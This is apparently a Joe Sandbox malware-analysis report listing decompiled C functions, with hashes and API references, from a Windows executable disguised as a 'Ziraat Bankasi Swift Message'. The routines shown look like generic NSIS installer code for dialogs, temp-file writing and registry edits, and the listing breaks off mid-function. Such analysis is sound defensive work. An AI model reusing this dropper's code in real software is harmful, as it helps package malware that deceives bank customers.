                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" $*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                  • API String ID: 589700163-2021363327
                                  • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                                  • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                                  • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                                  • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                  				struct tagLOGBRUSH _v16;
                                  				long _t35;
                                  				long _t37;
                                  				void* _t40;
                                  				long* _t49;
                                  
                                  				if(_a4 + 0xfffffecd > 5) {
                                  					L15:
                                  					return 0;
                                  				}
                                  				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                  				if(_t49 == 0) {
                                  					goto L15;
                                  				}
                                  				_t35 =  *_t49;
                                  				if((_t49[5] & 0x00000002) != 0) {
                                  					_t35 = GetSysColor(_t35);
                                  				}
                                  				if((_t49[5] & 0x00000001) != 0) {
                                  					SetTextColor(_a8, _t35);
                                  				}
                                  				SetBkMode(_a8, _t49[4]);
                                  				_t37 = _t49[1];
                                  				_v16.lbColor = _t37;
                                  				if((_t49[5] & 0x00000008) != 0) {
                                  					_t37 = GetSysColor(_t37);
                                  					_v16.lbColor = _t37;
                                  				}
                                  				if((_t49[5] & 0x00000004) != 0) {
                                  					SetBkColor(_a8, _t37);
                                  				}
                                  				if((_t49[5] & 0x00000010) != 0) {
                                  					_v16.lbStyle = _t49[2];
                                  					_t40 = _t49[3];
                                  					if(_t40 != 0) {
                                  						DeleteObject(_t40);
                                  					}
                                  					_t49[3] = CreateBrushIndirect( &_v16);
                                  				}
                                  				return _t49[3];
                                  			}








                                  0x00403eb0
                                  0x00403f44
                                  0x00000000
                                  0x00403f44
                                  0x00403ec1
                                  0x00403ec5
                                  0x00000000
                                  0x00000000
                                  0x00403ecb
                                  0x00403ed4
                                  0x00403ed7
                                  0x00403ed7
                                  0x00403edd
                                  0x00403ee3
                                  0x00403ee3
                                  0x00403eef
                                  0x00403ef5
                                  0x00403efc
                                  0x00403eff
                                  0x00403f02
                                  0x00403f04
                                  0x00403f04
                                  0x00403f0c
                                  0x00403f12
                                  0x00403f12
                                  0x00403f1c
                                  0x00403f21
                                  0x00403f24
                                  0x00403f29
                                  0x00403f2c
                                  0x00403f2c
                                  0x00403f3c
                                  0x00403f3c
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                  • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                                  • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                  • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0040266E(struct _OVERLAPPED* __ebx) {
                                  				void* _t27;
                                  				long _t32;
                                  				struct _OVERLAPPED* _t47;
                                  				void* _t51;
                                  				void* _t53;
                                  				void* _t56;
                                  				void* _t57;
                                  				void* _t58;
                                  
                                  				_t47 = __ebx;
                                  				 *(_t58 - 8) = 0xfffffd66;
                                  				_t52 = E004029E8(0xfffffff0);
                                  				 *(_t58 - 0x44) = _t24;
                                  				if(E004055E5(_t52) == 0) {
                                  					E004029E8(0xffffffed);
                                  				}
                                  				E0040573D(_t52);
                                  				_t27 = E0040575C(_t52, 0x40000000, 2);
                                  				 *(_t58 + 8) = _t27;
                                  				if(_t27 != 0xffffffff) {
                                  					_t32 =  *0x423eb4;
                                  					 *(_t58 - 0x2c) = _t32;
                                  					_t51 = GlobalAlloc(0x40, _t32);
                                  					if(_t51 != _t47) {
                                  						E004031DA(_t47);
                                  						E004031A8(_t51,  *(_t58 - 0x2c));
                                  						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                  						 *(_t58 - 0x30) = _t56;
                                  						if(_t56 != _t47) {
                                  							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                  							while( *_t56 != _t47) {
                                  								_t49 =  *_t56;
                                  								_t57 = _t56 + 8;
                                  								 *(_t58 - 0x38) =  *_t56;
                                  								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                  								_t56 = _t57 +  *(_t58 - 0x38);
                                  							}
                                  							GlobalFree( *(_t58 - 0x30));
                                  						}
                                  						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                  						GlobalFree(_t51);
                                  						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
                                  					}
                                  					CloseHandle( *(_t58 + 8));
                                  				}
                                  				_t53 = 0xfffffff3;
                                  				if( *(_t58 - 8) < _t47) {
                                  					_t53 = 0xffffffef;
                                  					DeleteFileA( *(_t58 - 0x44));
                                  					 *((intOrPtr*)(_t58 - 4)) = 1;
                                  				}
                                  				_push(_t53);
                                  				E00401423();
                                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
                                  				return 0;
                                  			}











                                  0x0040266e
                                  0x00402670
                                  0x0040267c
                                  0x0040267f
                                  0x00402689
                                  0x0040268d
                                  0x0040268d
                                  0x00402693
                                  0x004026a0
                                  0x004026a8
                                  0x004026ab
                                  0x004026b1
                                  0x004026bf
                                  0x004026c4
                                  0x004026c8
                                  0x004026cb
                                  0x004026d4
                                  0x004026e0
                                  0x004026e4
                                  0x004026e7
                                  0x004026f1
                                  0x00402710
                                  0x004026f8
                                  0x004026fd
                                  0x00402705
                                  0x00402708
                                  0x0040270d
                                  0x0040270d
                                  0x00402717
                                  0x00402717
                                  0x00402729
                                  0x00402730
                                  0x00402742
                                  0x00402742
                                  0x00402748
                                  0x00402748
                                  0x00402753
                                  0x00402754
                                  0x00402758
                                  0x0040275c
                                  0x00402762
                                  0x00402762
                                  0x00402769
                                  0x00402156
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                  • GlobalFree.KERNEL32 ref: 00402717
                                  • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                  • GlobalFree.KERNEL32 ref: 00402730
                                  • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                  • String ID:
                                  • API String ID: 3294113728-0
                                  • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                                  • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                                  • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                                  • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404E23(CHAR* _a4, CHAR* _a8) {
                                  				struct HWND__* _v8;
                                  				signed int _v12;
                                  				CHAR* _v32;
                                  				long _v44;
                                  				int _v48;
                                  				void* _v52;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				CHAR* _t26;
                                  				signed int _t27;
                                  				CHAR* _t28;
                                  				long _t29;
                                  				signed int _t39;
                                  
                                  				_t26 =  *0x423684;
                                  				_v8 = _t26;
                                  				if(_t26 != 0) {
                                  					_t27 =  *0x423f54;
                                  					_v12 = _t27;
                                  					_t39 = _t27 & 0x00000001;
                                  					if(_t39 == 0) {
                                  						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
                                  					}
                                  					_t26 = lstrlenA(0x41fc70);
                                  					_a4 = _t26;
                                  					if(_a8 == 0) {
                                  						L6:
                                  						if((_v12 & 0x00000004) == 0) {
                                  							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
                                  						}
                                  						if((_v12 & 0x00000002) == 0) {
                                  							_v32 = 0x41fc70;
                                  							_v52 = 1;
                                  							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                  							_v44 = 0;
                                  							_v48 = _t29 - _t39;
                                  							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                  							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                  						}
                                  						if(_t39 != 0) {
                                  							_t28 = _a4;
                                  							 *((char*)(_t28 + 0x41fc70)) = 0;
                                  							return _t28;
                                  						}
                                  					} else {
                                  						_t26 =  &(_a4[lstrlenA(_a8)]);
                                  						if(_t26 < 0x800) {
                                  							_t26 = lstrcatA(0x41fc70, _a8);
                                  							goto L6;
                                  						}
                                  					}
                                  				}
                                  				return _t26;
                                  			}

















                                  0x00404e29
                                  0x00404e35
                                  0x00404e38
                                  0x00404e3e
                                  0x00404e4a
                                  0x00404e4d
                                  0x00404e50
                                  0x00404e56
                                  0x00404e56
                                  0x00404e5c
                                  0x00404e64
                                  0x00404e67
                                  0x00404e84
                                  0x00404e88
                                  0x00404e91
                                  0x00404e91
                                  0x00404e9b
                                  0x00404ea4
                                  0x00404eb0
                                  0x00404eb7
                                  0x00404ebb
                                  0x00404ebe
                                  0x00404ed1
                                  0x00404edf
                                  0x00404edf
                                  0x00404ee3
                                  0x00404ee5
                                  0x00404ee8
                                  0x00000000
                                  0x00404ee8
                                  0x00404e69
                                  0x00404e71
                                  0x00404e79
                                  0x00404e7f
                                  0x00000000
                                  0x00404e7f
                                  0x00404e79
                                  0x00404e67
                                  0x00404ef2

                                  APIs
                                  • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                  • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                  • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                  • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                  • SendMessageA.USER32 ref: 00404EB7
                                  • SendMessageA.USER32 ref: 00404ED1
                                  • SendMessageA.USER32 ref: 00404EDF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2531174081-0
                                  • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                                  • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                                  • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                                  • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
                                  				long _v8;
                                  				signed char _v12;
                                  				unsigned int _v16;
                                  				void* _v20;
                                  				intOrPtr _v24;
                                  				long _v56;
                                  				void* _v60;
                                  				long _t15;
                                  				unsigned int _t19;
                                  				signed int _t25;
                                  				struct HWND__* _t28;
                                  
                                  				_t28 = _a4;
                                  				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                  				if(_a8 == 0) {
                                  					L4:
                                  					_v56 = _t15;
                                  					_v60 = 4;
                                  					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                  					return _v24;
                                  				}
                                  				_t19 = GetMessagePos();
                                  				_v16 = _t19 >> 0x10;
                                  				_v20 = _t19;
                                  				ScreenToClient(_t28,  &_v20);
                                  				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                  				if((_v12 & 0x00000066) != 0) {
                                  					_t15 = _v8;
                                  					goto L4;
                                  				}
                                  				return _t25 | 0xffffffff;
                                  			}














                                  0x00404700
                                  0x0040470d
                                  0x00404713
                                  0x00404751
                                  0x00404751
                                  0x00404760
                                  0x00404767
                                  0x00000000
                                  0x00404769
                                  0x00404715
                                  0x00404724
                                  0x0040472c
                                  0x0040472f
                                  0x00404741
                                  0x00404747
                                  0x0040474e
                                  0x00000000
                                  0x0040474e
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                  • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                                  • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                  • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
                                  				char _v68;
                                  				void* _t11;
                                  				CHAR* _t19;
                                  
                                  				if(_a8 == 0x110) {
                                  					SetTimer(_a4, 1, 0xfa, 0);
                                  					_a8 = 0x113;
                                  				}
                                  				if(_a8 == 0x113) {
                                  					_t11 = E00402BA9();
                                  					_t19 = "unpacking data: %d%%";
                                  					if( *0x423eb0 == 0) {
                                  						_t19 = "verifying installer: %d%%";
                                  					}
                                  					wsprintfA( &_v68, _t19, _t11);
                                  					SetWindowTextA(_a4,  &_v68);
                                  					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                  				}
                                  				return 0;
                                  			}






                                  0x00402b3a
                                  0x00402b48
                                  0x00402b4e
                                  0x00402b4e
                                  0x00402b5c
                                  0x00402b5e
                                  0x00402b6a
                                  0x00402b6f
                                  0x00402b71
                                  0x00402b71
                                  0x00402b7c
                                  0x00402b8c
                                  0x00402b9e
                                  0x00402b9e
                                  0x00402ba6

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                  • API String ID: 1451636040-1158693248
                                  • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                                  • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                                  • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                                  • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E004022F5(void* __eax) {
                                  				void* _t15;
                                  				char* _t18;
                                  				int _t19;
                                  				char _t24;
                                  				int _t27;
                                  				intOrPtr _t35;
                                  				void* _t37;
                                  
                                  				_t15 = E00402ADD(__eax);
                                  				_t35 =  *((intOrPtr*)(_t37 - 0x14));
                                  				 *(_t37 - 0x30) =  *(_t37 - 0x10);
                                  				 *(_t37 - 0x44) = E004029E8(2);
                                  				_t18 = E004029E8(0x11);
                                  				_t31 =  *0x423f50 | 0x00000002;
                                  				 *(_t37 - 4) = 1;
                                  				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
                                  				if(_t19 == 0) {
                                  					if(_t35 == 1) {
                                  						E004029E8(0x23);
                                  						_t19 = lstrlenA(0x40a368) + 1;
                                  					}
                                  					if(_t35 == 4) {
                                  						_t24 = E004029CB(3);
                                  						 *0x40a368 = _t24;
                                  						_t19 = _t35;
                                  					}
                                  					if(_t35 == 3) {
                                  						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
                                  					}
                                  					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
                                  						 *(_t37 - 4) = _t27;
                                  					}
                                  					_push( *(_t37 + 8));
                                  					RegCloseKey();
                                  				}
                                  				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
                                  				return 0;
                                  			}










                                  0x004022f6
                                  0x004022fb
                                  0x00402305
                                  0x0040230f
                                  0x00402312
                                  0x00402322
                                  0x0040232c
                                  0x00402333
                                  0x0040233b
                                  0x00402349
                                  0x0040234d
                                  0x00402358
                                  0x00402358
                                  0x0040235c
                                  0x00402360
                                  0x00402366
                                  0x0040236b
                                  0x0040236b
                                  0x0040236f
                                  0x0040237b
                                  0x0040237b
                                  0x00402394
                                  0x00402396
                                  0x00402396
                                  0x00402399
                                  0x0040246f
                                  0x0040246f
                                  0x00402880
                                  0x0040288c

                                  APIs
                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                                  • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: CloseCreateValuelstrlen
                                  • String ID: C:\Users\user~1\AppData\Local\Temp\nsyAE26.tmp
                                  • API String ID: 1356686001-4129452131
                                  • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                                  • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                                  • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                                  • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402BC5(intOrPtr _a4) {
                                  				char _v68;
                                  				long _t6;
                                  				struct HWND__* _t7;
                                  				struct HWND__* _t14;
                                  
                                  				if(_a4 != 0) {
                                  					_t14 =  *0x417044; // 0x0
                                  					if(_t14 != 0) {
                                  						_t14 = DestroyWindow(_t14);
                                  					}
                                  					 *0x417044 = 0;
                                  					return _t14;
                                  				}
                                  				__eflags =  *0x417044; // 0x0
                                  				if(__eflags != 0) {
                                  					return E00405DDC(0);
                                  				}
                                  				_t6 = GetTickCount();
                                  				__eflags = _t6 -  *0x423eac;
                                  				if(_t6 >  *0x423eac) {
                                  					__eflags =  *0x423ea8;
                                  					if( *0x423ea8 == 0) {
                                  						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
                                  						 *0x417044 = _t7;
                                  						return _t7;
                                  					}
                                  					__eflags =  *0x423f54 & 0x00000001;
                                  					if(( *0x423f54 & 0x00000001) != 0) {
                                  						wsprintfA( &_v68, "... %d%%", E00402BA9());
                                  						return E00404E23(0,  &_v68);
                                  					}
                                  				}
                                  				return _t6;
                                  			}







                                  0x00402bd1
                                  0x00402bd3
                                  0x00402bda
                                  0x00402bdd
                                  0x00402bdd
                                  0x00402be3
                                  0x00000000
                                  0x00402be3
                                  0x00402beb
                                  0x00402bf1
                                  0x00000000
                                  0x00402bf4
                                  0x00402bfb
                                  0x00402c01
                                  0x00402c07
                                  0x00402c09
                                  0x00402c0f
                                  0x00402c4d
                                  0x00402c53
                                  0x00000000
                                  0x00402c53
                                  0x00402c11
                                  0x00402c18
                                  0x00402c29
                                  0x00000000
                                  0x00402c37
                                  0x00402c18
                                  0x00402c5a

                                  APIs
                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                                  • GetTickCount.KERNEL32 ref: 00402BFB
                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                                    • Part of subcall function 00402BA9: MulDiv.KERNEL32(00042A72,00000064,00044318), ref: 00402BBE
                                  • wsprintfA.USER32 ref: 00402C29
                                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                                    • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.293204636.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.293198616.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293230556.0000000000407000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293256524.0000000000409000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293314414.0000000000422000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293341301.0000000000429000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.293356616.000000000042C000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Ziraat Bankasi Swift Mesaji.jbxd
                                  Similarity
                                  • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 632923820-2449383134
                                  • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                                  • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                                  • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                                  • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
                                  				void* _v8;
                                  				char _v272;
                                  				long _t18;
                                  				intOrPtr* _t27;
                                  				long _t28;
                                  
                                  				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
                                  				if(_t18 == 0) {
                                  					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                  						if(_a12 != 0) {
                                  							RegCloseKey(_v8);
                                  							L8:
                                  							return 1;
                                  						}
                                  						if(E00402A28(_v8,  &_v272, 0) != 0) {
                                  							break;
                                  						}
                                  					}
                                  					RegCloseKey(_v8);
                                  					_t27 = E00405DA3(2);
                                  					if(_t27 == 0) {
                                  						if( *0x423f50 != 0) {
                                  							goto L8;
                                  						}
                                  						_t28 = RegDeleteKeyA(_a4, _a8);
                                  						if(_t28 != 0) {
                                  							goto L8;
                                  						}
                                  						return _t28;
                                  					}
                                  					return  *_t27(_a4, _a8,  *0x423f50, 0);
                                  				}
                                  				return _t18;
